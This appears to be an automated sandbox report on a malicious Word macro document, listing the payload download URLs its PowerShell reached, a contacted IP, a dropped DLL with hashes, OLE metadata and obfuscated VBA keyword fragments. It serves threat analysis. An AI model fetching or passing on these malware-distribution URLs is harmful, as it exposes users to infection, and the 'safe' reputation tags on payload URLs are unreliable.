http://mail.kyojinconduits.com0%Avira URL Cloudsafe
http://accuratebc.gr/e0lw3t.zip0%Avira URL Cloudsafe
http://theworldofjacob.com/cjsomlo.zip0%Avira URL Cloudsafe
http://legion.seriesnow.website/q33rv2.zip0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://e-macom.com.br/cl35e0.zip0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://mail.kyojinconduits.com/jhgun753.zip100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mail.kyojinconduits.com
198.54.126.36
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://mail.kyojinconduits.com/jhgun753.ziptrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpfalse
      high
      http://tumkuv.org.tr/zd8dxb2u.zippowershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      unknown
      http://investor.msn.comrundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmpfalse
            high
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmpfalse
              high
              http://mail.kyojinconduits.compowershell.exe, 00000005.00000002.2094918402.0000000003CBC000.00000004.00000001.sdmptrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://accuratebc.gr/e0lw3t.zippowershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.com/rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpfalse
                high
                http://theworldofjacob.com/cjsomlo.zippowershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://legion.seriesnow.website/q33rv2.zippowershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmpfalse
                  high
                  http://www.%s.comPApowershell.exe, 00000005.00000002.2090150782.00000000023E0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098302975.00000000026C0000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  low
                  http://e-macom.com.br/cl35e0.zippowershell.exe, 00000005.00000002.2094783076.0000000003BB5000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2103215814.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098004693.00000000022E7000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    198.54.126.36
                    unknownUnited States
                    22612NAMECHEAP-NETUStrue

                    General Information

                    Joe Sandbox Version:31.0.0 Red Diamond
                    Analysis ID:339433
                    Start date:14.01.2021
                    Start time:02:31:58
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:Order.802796810.doc
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • GSI enabled (VBA)
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winDOC@10/7@1/1
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 2.7% (good quality ratio 2.6%)
                    • Quality average: 80.2%
                    • Quality standard deviation: 21.6%
                    HCA Information:
                    • Successful, ratio: 66%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Found warning dialog
                    • Click Ok
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                    • TCP Packets have been reduced to 100
                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    02:32:37API Interceptor1x Sleep call for process: msg.exe modified
                    02:32:37API Interceptor39x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    NAMECHEAP-NETUSJdtN8nIcLi8RQOi.exeGet hashmaliciousBrowse
                    • 198.54.117.244
                    Inv.exeGet hashmaliciousBrowse
                    • 198.54.117.217
                    QPR-1064.pdf.exeGet hashmaliciousBrowse
                    • 162.213.253.37
                    in.exeGet hashmaliciousBrowse
                    • 198.54.117.216
                    SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                    • 199.193.7.228
                    DHL-Address.xlsxGet hashmaliciousBrowse
                    • 199.193.7.228
                    New FedEx paper work review.exeGet hashmaliciousBrowse
                    • 198.54.122.60
                    PO-000202112.exeGet hashmaliciousBrowse
                    • 63.250.34.114
                    urgent specification request.exeGet hashmaliciousBrowse
                    • 198.54.117.210
                    g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                    • 198.54.117.210
                    shipping-document.xlsxGet hashmaliciousBrowse
                    • 199.193.7.228
                    Project review_Pdf.exeGet hashmaliciousBrowse
                    • 198.54.117.215
                    iVUeQOg6LO.exeGet hashmaliciousBrowse
                    • 199.193.7.228
                    mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                    • 162.255.118.194
                    SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                    • 199.193.7.228
                    Purchase Order -263.exeGet hashmaliciousBrowse
                    • 162.0.232.59
                    Duty checklist and PTP letter.exeGet hashmaliciousBrowse
                    • 162.255.119.136
                    zz4osC4FRa.exeGet hashmaliciousBrowse
                    • 162.0.238.245
                    0XrD9TsGUr.exeGet hashmaliciousBrowse
                    • 198.54.117.216
                    DHL-document.xlsxGet hashmaliciousBrowse
                    • 199.193.7.228

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1A67161-551E-40AF-9919-E039C2A6E74E}.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Order.802796810.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Jan 14 09:32:34 2021, length=90624, window=hide
                    Category:dropped
                    Size (bytes):2078
                    Entropy (8bit):4.495464059099852
                    Encrypted:false
                    SSDEEP:24:8F/Sn/XTwz6IknaZJe28Dv3qTadM7dD2F/Sn/XTwz6IknaZJe28Dv3qTadM7dV:8Fan/XT3Ik+JFOQh2Fan/XT3Ik+JFOQ/
                    MD5:0DF10D21BD33FA3E2345F41649705062
                    SHA1:5F02B0BEBEDCB6B0B5D400AEBE18F08F40630DE5
                    SHA-256:85B4AED5D1B2067E877D074E969129FA5C14602578E08EE9D6A7D04C8478B481
                    SHA-512:0DFE6225D5661C9FC252A55C12C128594E17D3541EFFFF2A57F0983A16B9D679C6CFE8BA648788CA7380EC5EEC92B02DC5DF866809DFF6A1F6C61E0788BA3C4D
                    Malicious:false
                    Reputation:low
                    Preview: L..................F.... ...w.A..{..w.A..{..1.-.`....b...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2..b...R.T .ORDER8~1.DOC..T.......Q.y.Q.y*...8.....................O.r.d.e.r...8.0.2.7.9.6.8.1.0...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\Order.802796810.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.r.d.e.r...8.0.2.7.9.6.8.1.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......116938..........D_....3N...W...9F.C.........
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):83
                    Entropy (8bit):4.324541431671379
                    Encrypted:false
                    SSDEEP:3:M1sBYHLHyOHLHmX1sBYHLHv:MSBYHLBHLfBYHLP
                    MD5:076F398C997AEE2D2069FD31BB1E2EF3
                    SHA1:A57E16C2C04465C89BFBBD64FA2A2DDB5AF73DC8
                    SHA-256:E30998E99736605145F47F9CC0E3EE8815E2A076A17B45C095CA57B1BED20B34
                    SHA-512:E23A5D80538A92E90168F0C265E21EC7BE1289FBAFF1784A32CA0C90310FB5F1F96F2239131202C781AF48942021190934520EF3C27A6CE083E465A2CE024366
                    Malicious:false
                    Reputation:low
                    Preview: [doc]..Order.802796810.LNK=0..Order.802796810.LNK=0..[doc]..Order.802796810.LNK=0..
                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.431160061181642
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RJL0BX05F30CVKZ4577U.temp
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.5821267604985123
                    Encrypted:false
                    SSDEEP:96:chQCsMqbqvsqvJCwooz8hQCsMqbqvsEHyqvJCworuzkKYkHDf8RelUVqIu:cyKooz8yyHnoruzk2f8R4Iu
                    MD5:C5897F2916F8BD64B69E1CE6E45689B0
                    SHA1:E7ED8F7A715276229820F5FAFBAC4163AEBEE2B7
                    SHA-256:516E5A9ED13D4B77C4CC052ABF74C77706A29DDDE9748B00DAA9E17D58E857F0
                    SHA-512:031BAD39807DCE697A060DCF2603769562B99076728FA3F4BD66FBF385083AFE0DBE11EEEC9BDF66BFA65291DAF24BD5D7BD9E982550F8A42684EA230440717A
                    Malicious:false
                    Reputation:low
                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    C:\Users\user\Desktop\~$der.802796810.doc
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.431160061181642
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                    C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):303616
                    Entropy (8bit):7.173905139494844
                    Encrypted:false
                    SSDEEP:6144:N1IxO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B9G41awUX:nIxO02Srnh0qEJC+Y2G4vU
                    MD5:91C429408A1274F464F758FB80B4A472
                    SHA1:E99043E4FA16B7848046DFBAEDE219EAD1307ED3
                    SHA-256:A5EC84D475CBD8672DF09FC348DC46569117929A87D33FE3EF12396B6041730D
                    SHA-512:12C6E99952A64A381DD8CA86FD8BC4195A452F395EE058C18A35B9C092C5260852D3E224117DB2F853FD53A6E9A272B69AA2872AB089E0195E3431DD13A9E2EC
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 43%
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.r...,...............0...............................................................................c.......................................................................................h...............................text............................... ..`.rdata.......0......................@..@.2...........@....... ..............@..@.rdata2......P......."..............@..@.data........`.......$..............@....text5..P............B.............. ..@.text4...R.......T...F.............. ..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: bandwidth-monitored strategize Investment Account Well Small full-range Product, Author: Julie Marty, Template: Normal.dotm, Last Saved By: Lo Guyot, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jan 13 12:11:00 2021, Last Saved Time/Date: Wed Jan 13 12:12:00 2021, Number of Pages: 1, Number of Words: 3127, Number of Characters: 17826, Security: 8
                    Entropy (8bit):5.716420354668234
                    TrID:
                    • Microsoft Word document (32009/1) 79.99%
                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                    File name:Order.802796810.doc
                    File size:89451
                    MD5:b1c2a32cb28d07acc8b2d65ab2012db8
                    SHA1:3ac3123decd86944a576227554edbcbb3d62aa58
                    SHA256:6951461b231a0f4f2ee086768d3e5e79b30dd68efd55da80997d73c160e6ddce
                    SHA512:e459e361501efa4f1c22748a0715c0e78af58690e207e08e40bbe739e002b3b9e10207987345e907559069f0866aca03e4080fe69eb0fa722ef03179dd292430
                    SSDEEP:768:KzCBUdRqgWvluJaSaVB5a38s/yJk2tKerSIViUcdrXSrkl0WdtiIJTDEZ7O8OQ+F:KVtiiEZbWX9Nb2LbgfjNqJu
                    File Content Preview:........................>.......................x...........{...............w..................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4eea2aaa4b4b4a4

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "Order.802796810.doc"

                    Indicators

                    Has Summary Info:True
                    Application Name:Microsoft Office Word
                    Encrypted Document:False
                    Contains Word Document Stream:True
                    Contains Workbook/Book Stream:False
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:True

                    Summary

                    Code Page:1252
                    Title:
                    Subject:bandwidth-monitored strategize Investment Account Well Small full-range Product
                    Author:Julie Marty
                    Keywords:
                    Comments:
                    Template:Normal.dotm
                    Last Saved By:Lo Guyot
                    Revion Number:1
                    Total Edit Time:0
                    Create Time:2021-01-13 12:11:00
                    Last Saved Time:2021-01-13 12:12:00
                    Number of Pages:1
                    Number of Words:3127
                    Number of Characters:17826
                    Creating Application:Microsoft Office Word
                    Security:8

                    Document Summary

                    Document Code Page:-535
                    Number of Lines:148
                    Number of Paragraphs:41
                    Thumbnail Scaling Desired:False
                    Company:
                    Contains Dirty Links:False
                    Shared Document:False
                    Changed Hyperlinks:False
                    Application Version:917504

                    Streams with VBA

                    VBA File Name: Hcpsclo3w5h, Stream Size: 1107
                    General
                    Stream Path:Macros/VBA/Hcpsclo3w5h
                    VBA File Name:Hcpsclo3w5h
                    Stream Size:1107
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 c8 db 95 ca 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    False
                    Private
                    VB_Exposed
                    Attribute
                    VB_Creatable
                    VB_Name
                    Document_open()
                    VB_PredeclaredId
                    VB_GlobalNameSpace
                    VB_Base
                    VB_Customizable
                    VB_TemplateDerived
                    VBA Code
                    VBA File Name: Ty191wz8hynv3fl, Stream Size: 14181
                    General
                    Stream Path:Macros/VBA/Ty191wz8hynv3fl
                    VBA File Name:Ty191wz8hynv3fl
                    Stream Size:14181
                    Data ASCII:. . . . . . . . . D . . . . . . . . . . . . . . . L . . . , * . . . . . . . . . . . . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 44 08 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 4c 08 00 00 2c 2a 00 00 00 00 00 00 01 00 00 00 c8 db 79 03 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    ZbPUDheF
                    Left(QzXjC.Range.ParagraphStyle,
                    InSKq:
                    ZOfUMb
                    lzRUYEYJE.Range.ParagraphStyle
                    eRXpg)
                    TuHaAH
                    "A][q[D",
                    InSKq)
                    InStr(ZOfUMb.Range.Text,
                    ebsKiHACO
                    fdpzD.Range.Text
                    DdnFBBZ
                    QzXjC.Range.ListFormat.ListString
                    Resume
                    rLOxC:
                    ZbPUDheF:
                    YpSuBch.Range.ParagraphStyle
                    lzRUYEYJE.Range.ListFormat.ListString
                    xhBqCNvFG.Range.Text
                    rLOxC)
                    "A][q[DA][q[D"
                    KnOOFFBD
                    SXNFEJJ
                    mxioLAcLC)
                    rBPyeAB:
                    aoLyMFjDk
                    "HW-"
                    UzOxVAC.Range.Text
                    Left(XIBGeiH.Range.ParagraphStyle,
                    mxioLAcLC:
                    Paragraph
                    rBPyeAB)
                    Left(EHsfBFdxG.Range.ParagraphStyle,
                    NVFTkVQ
                    Left(oPSQA.Range.ParagraphStyle,
                    UBdrJozv
                    "A][q[DpA][q[D"
                    PUqzDBXG.Range.ListFormat.ListString
                    XzcvhD
                    UBdrJozv:
                    "Heading"
                    XzcvhD:
                    "wA][q[DinA][q[DmA][q[DgmA][q[DtA][q[DA][q[D"
                    XIBGeiH.Range.ListFormat.ListString
                    UBdrJozv)
                    oPSQA
                    eRXpg
                    QzXjC.Range.ParagraphStyle
                    InStr(fdpzD.Range.Text,
                    InStr(oPSQA.Range.Text,
                    fdpzD.Range.ParagraphStyle
                    hKRjei
                    ZOfUMb.Range.Text
                    ZbPUDheF)
                    aZsPEAcFH
                    QzXjC.Range.Text
                    Left(YpSuBch.Range.ParagraphStyle,
                    TuHaAH.Range.ListFormat.ListString
                    PuugBv
                    InStr(EHsfBFdxG.Range.Text,
                    ffUzC
                    DdnFBBZ)
                    OMOkIM:
                    EHsfBFdxG.Range.ParagraphStyle
                    dYJvJ
                    DdnFBBZ:
                    PUqzDBXG.Range.Text
                    OMOkIM)
                    Left(lzRUYEYJE.Range.ParagraphStyle,
                    RIomq
                    rBPyeAB
                    hKRjei.Range.ParagraphStyle
                    nxnMAC
                    InStr(TuHaAH.Range.Text,
                    InStr(PUqzDBXG.Range.Text,
                    ElseIf
                    PUqzDBXG
                    lzRUYEYJE.Range.Text
                    oPSQA.Range.Text
                    PUqzDBXG.Range.ParagraphStyle
                    mxioLAcLC
                    UfPcWG
                    zqlCAhL.Range.Text
                    InStr(xhBqCNvFG.Range.Text,
                    UzOxVAC
                    oPSQA.Range.ListFormat.ListString
                    InStr(zqlCAhL.Range.Text,
                    Left(PUqzDBXG.Range.ParagraphStyle,
                    hQUbIDUBB)
                    sweee
                    InStr(XIBGeiH.Range.Text,
                    jlHoSEITt.Range.ParagraphStyle
                    jlHoSEITt
                    oPSQA.Range.ParagraphStyle
                    Left(jlHoSEITt.Range.ParagraphStyle,
                    aZsPEAcFH)
                    Len(sweee))),
                    NVFTkVQ)
                    YpSuBch.Range.ListFormat.ListString
                    jlHoSEITt.Range.Text
                    "HW")
                    aZsPEAcFH:
                    "HW",
                    rLOxC
                    XIBGeiH
                    LSfPODO.Range.Text
                    SMXeC
                    Left(zqlCAhL.Range.ParagraphStyle,
                    VnWdAF
                    fdpzD
                    InStr(QzXjC.Range.Text,
                    hQUbIDUBB:
                    UzOxVAC.Range.ListFormat.ListString
                    xhBqCNvFG
                    InStr(YpSuBch.Range.Text,
                    LSfPODO
                    EHsfBFdxG.Range.Text
                    zqlCAhL.Range.ParagraphStyle
                    Left(xhBqCNvFG.Range.ParagraphStyle,
                    ZOfUMb.Range.ParagraphStyle
                    mSaKFJSB:
                    Error
                    InStr(LSfPODO.Range.Text,
                    YpSuBch
                    EHsfBFdxG.Range.ListFormat.ListString
                    zqlCAhL
                    Left(fdpzD.Range.ParagraphStyle,
                    ebsKiHACO)
                    Attribute
                    ebsKiHACO:
                    zqlCAhL.Range.ListFormat.ListString
                    LSfPODO.Range.ListFormat.ListString
                    iBElDYCi
                    mSaKFJSB
                    TuHaAH.Range.Text
                    Left(hKRjei.Range.ParagraphStyle,
                    TuHaAH.Range.ParagraphStyle
                    kBgvEBGC
                    uhsdfv
                    VB_Name
                    eRXpg:
                    Left(TuHaAH.Range.ParagraphStyle,
                    NVFTkVQ:
                    EHsfBFdxG
                    XzcvhD)
                    AhJql
                    hQUbIDUBB
                    mSaKFJSB)
                    Function
                    jlHoSEITt.Range.ListFormat.ListString
                    InStr(jlHoSEITt.Range.Text,
                    InStr(hKRjei.Range.Text,
                    Left(LSfPODO.Range.ParagraphStyle,
                    QzXjC
                    hKRjei.Range.ListFormat.ListString
                    lzRUYEYJE
                    fdpzD.Range.ListFormat.ListString
                    InSKq
                    VqryV
                    Replace(myString,
                    XIBGeiH.Range.Text
                    hKRjei.Range.Text
                    CPMStk
                    xhBqCNvFG.Range.ParagraphStyle
                    LSfPODO.Range.ParagraphStyle
                    Left(UzOxVAC.Range.ParagraphStyle,
                    InStr(UzOxVAC.Range.Text,
                    "A][q[DroA][q[DA][q[DceA][q[DsA][q[DsA][q[DA][q[D"
                    Len("Heading"))
                    Left(ZOfUMb.Range.ParagraphStyle,
                    YpSuBch.Range.Text
                    xhBqCNvFG.Range.ListFormat.ListString
                    UzOxVAC.Range.ParagraphStyle
                    AhJql:
                    Mid(Application.Name,
                    ZOfUMb.Range.ListFormat.ListString
                    fepnAEWJ
                    InStr(lzRUYEYJE.Range.Text,
                    OMOkIM
                    AhJql)
                    XIBGeiH.Range.ParagraphStyle
                    VBA Code
                    VBA File Name: X3l1wup0ifeb, Stream Size: 699
                    General
                    Stream Path:Macros/VBA/X3l1wup0ifeb
                    VBA File Name:X3l1wup0ifeb
